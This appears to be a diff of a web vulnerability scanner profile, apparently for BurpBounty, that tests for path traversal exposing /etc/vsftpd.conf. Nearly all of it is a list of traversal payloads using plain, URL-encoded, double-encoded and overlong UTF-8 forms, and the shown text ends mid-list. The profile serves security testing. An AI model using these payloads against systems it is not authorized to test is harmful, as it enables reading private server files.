./././././././././././././././././././././././././././../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","./../{FILE}","./.././../{FILE}","./.././.././../{FILE}","./.././.././.././../{FILE}","./.././.././.././.././../{FILE}","./.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././.././../{FILE}",".\\..\\{FILE}",".\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".//..//{FILE}",".//..//.//..//{FILE}",".//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}","../{FILE}","../..//{FILE}","../..//../{FILE}","../..//../..//{FILE}","../..//../..//../{FILE}","../..//../..//../..//{FILE}","../..//../..//../..//../{FILE}","../..//../..//../..//../..//{FILE}","..\\{FILE}","..\\..\\\\{FILE}","..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..///{FILE}","../..///{FILE}","../..//..///{FILE}","../..//../..///{FILE}","../..//../..//..///{FILE}","../..//../..//../..///{FILE}","../..//../..//../..//..///{FILE}","../..//../..//../..//../..///{FILE}","..\\\\\\{FILE}","..\\..\\\\\\{FILE}","..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,Example config file"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-vsftpd-conf","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Linux-vsftpd-conf","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"etc/vsftpd.conf","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Linux-vsftpd-conf", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@Sy3Omda", + "Payloads": [ + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,..%c0%af{FILE}", + "true,..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + 